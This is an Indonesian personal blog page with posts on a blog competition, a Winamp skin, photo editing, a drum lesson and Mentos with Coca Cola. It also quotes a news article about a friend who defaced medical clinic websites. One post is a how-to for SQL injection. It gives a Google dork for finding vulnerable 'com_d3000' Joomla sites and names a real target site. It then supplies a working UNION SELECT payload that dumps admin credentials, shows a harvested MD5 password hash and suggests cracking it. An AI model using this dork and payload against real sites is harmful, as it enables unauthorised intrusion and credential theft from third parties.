Thursday, February 26, 2009

Ikutan Djarum Black Blog Competition


Sebelumnya saya tidak ada niat untuk mendaftarkan blog saya ini pada ajang Djarum Black Blog Competition. Sempet ragu juga sih soalnya akan berkompetisi dengan blog2 yang tentunya lebih keren dan berbobot. Tapi atas anjuran teman yang Black Holic ( Maksud nya penghisap rokok Djarum Black ), saya disuruh mendaftarkan blog saya yg jelek ini. Yaudah, ikutan aja ah ..hehe sekalian nyari pengalaman soalnya belum pernah ikutan kompetisi blog. "Suka ga pede" kadang penyakit itu suka datang kalau mau ikut kompetisi. Tapi dengan niat yang baik akhirnya ikutan juga deh..hehe.

Kompetisi Djarum Black Blog Competition ternyata banyak peminat nya juga, tak sekedar blogger yang sudah pengalaman dari kalangan pelajarpun tak sedikit yang mengikutin kompetisi ini. Selain mengasah kreativitas dalam nge-blog ternyata hadiah nya juga keren² juga. Urusan hadiah itu nasib yang menentukan yang penting saya disini ikut berkreasi juga. "Karena blogger bukan orang bodoh" tak seperti yang pernah di ucapkan sama selebritis TOP Indonesia.

Semoga dengan adanya event ini, makin banyak orang yang hobby nge-blog.
Bloging is art !





Wednesday, October 29, 2008

Winamp Media Tower ( Cool Winamp Skin )




Beuuh..skin winamp gw kali ini cool banget dah :D setelah kemaren gw make skin MMD yg keren juga. Kali ini gw make skin "winamp media tower" yang lebih keren design nya. Bagi kawand2 yg mau make skin ini, donlot aje di bagian "download zone" di blog gw ini.






Sunday, October 26, 2008

Belajar Editing Photo



Lagi demen belajar edit photo, tpi bingung mo edit photo siapa. Pas buka Fs, ada yg nge add. Setelah di liat2 album photo'a, eh ternyata pemilik nya gw knal. Hahaha..ada target neh buat di corat coret photo'a mumpung photoshop CS3 gw udah kebuka, langsung di coret" tuh photo.
maaf ya ade" ku sayang photo'a aa coret" :D



Saturday, October 25, 2008

The Diary Of Jane Drum Lesson With Chad Szeliga



Drum lesson with the drummer of Breaking Benjamin - Chad Szeliga.

URL Download video

http://www.youtube.com/watch?v=ROoZ-oqj-Mc

Copy paste to Youtube Downloader





Monday, October 20, 2008

SQL Injection "com_d3000"


Begitu banyak versi untuk SQL injection vulnerability, kali ini gw ambil salah satu SQL injection dari milw0rm. Seperti umum nya SQL inject yaiut membuka nama admin dan password nya yang masih ter-encrypt hash MD5.

Buka google, lalu ketik dork berikut allinurl: "com_d3000"
Setekah itu bakal keluar banyak beberapa web yang siap untuk di inject :))

Contoh :
http://blackorwhite.nl/index.php?option=com_d3000&task=showtop20

Lalu inject dengan exploit berikut :

index.php?option=com_d3000&task=
showarticles&id=-99999/**/union/**/select/**/
0,username,pass_word/**/from/**/admin/*

Dan hasil nya seperti berikut :

http://blackorwhite.nl/index.php?option=
com_d3000&task=showarticles&id=-99999/**/union
/**/select/**/0,username,pass_word/**/from/**/admin/*

Tertera pada halaman nya nama user dan password, tapi masih te-encrypt.
admin : 4cb9c8a8048fd02294477fcb1a41191a

Untuk men-decrypt nya banyak tools" online maupun software yg biasa untuk crack hash MD5.

dork & exploit from : milw0rm


Wednesday, September 24, 2008

HAS BEEN HACKED

Beberpa bulan yg lalu temen gw Mister Saint masuk kedalam system sebuah website dan melakukan defacing. Yang parah nya dari satu website yg di deface tersebut merembet ke 6 website lain nya. Dan kini nama nya jadi berita di beberapa site new di luar negri.
Berikut ini adalah artikel yang berhasil gw kutif dari http://www.stuff.co.nz/

" Security warning over patient files "

A hacker who "tagged" medical centre websites, including one in Wellington, could have gone on to gain access to patients' records, a computer security expert says.

Aura Software Security managing director Andy Prow said the hacker, who called himself "Mister Saint", appeared to be a prankster and made no attempt to gain access to patient data.

"But this highlights the security risks ... general practice should really take this as a warning."

As repositories of highly sensitive information, medical clinics were prime targets for hackers looking for kudos, he said.

Karori Medical Centre was among several practices that had their websites emblazoned with the cheeky message: "Hacked by Mister Saint".

Centre manager Jo Douglas said the bogus links were removed as soon as they were discovered last week and patient confidentiality was never compromised.

"The website is an information site only and it is totally separate to our patient record database."

However, Mr Prow, whose company advises police and the TAB on Internet security, said medical professionals should realise that anything on their PC or laptop could be fair game to hackers.

Cross-site scripting (XSS) allows hackers to inject code into web pages viewed by others and create "a gateway" into their computers, allowing them to steal confidential information or make changes.

The real danger was not from graffiti artists like Mister Saint, but from hackers who did not leave any clues during an attack, he said. "Doctors need to be aware of every click of the mouse and think about how they are handling patient records."

Security precautions, including passwords, firewalls and encryption, were basic requirements.

According to New Zealand Doctor magazine, all the websites attacked had obtained articles from the private online health information service Family Doctor, which is run by Auckland GP Dion Martley. Dr Martley was overseas and not available for comment.

Medical Association spokesman Mark Peterson, who chairs the GP Council, said there had been a huge push from the Health Ministry toward electronic patient records and for more sharing of that information among agencies.

"While the possibility of someone going in there with malicious intent to access individual patients' records is a remote possibility, we can't be complacent."

Most practices now employed IT managers to look after their computer systems at quite considerable expense, he said.

Privacy Commissioner Marie Shroff said businesses and government agencies were obliged to store personal information securely.

"That responsibility is higher where the information is sensitive or is given in a relationship of trust and confidence ... .

"If there are vulnerabilities that are highlighted by particular incidents, people should take note and assess the robustness of their systems in light of those incidents."





Friday, September 12, 2008

Mentos dan Coca Cola

Pasti semua sudah ngerasain permen Mentos dan dan pernah minum Coca Cola. Dua-dua nya emang enak dimakan. Tapi pernah ga makan kedua produk tersebut secara bersamaan?

Ini yang akan terjadi bila kedua produk itu di satukan.

Mentos dan Coca Cola
Mentos dan Coca Cola
Mentos dan Coca Cola
Mentos dan Coca Cola


Bayangkan apabila ini terjadi pada lambung anda?

Ada yg berani nyoba ..?

Thax to EA_Ngel